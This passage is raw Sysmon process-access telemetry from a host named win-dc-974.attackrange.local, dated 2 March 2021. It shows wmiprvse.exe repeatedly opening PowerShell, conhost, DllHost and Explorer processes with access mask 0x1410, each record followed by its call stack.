\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237038Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.340{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-78AA-00000000AD01}10508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237037Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.340{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-77AA-00000000AD01}11936C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237036Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-76AA-00000000AD01}8976C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237035Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-75AA-00000000AD01}3024C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237034Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237033Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237032Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237031Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237030Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237029Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237028Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237027Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237026Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237025Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237024Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237023Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237022Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237021Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.325{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 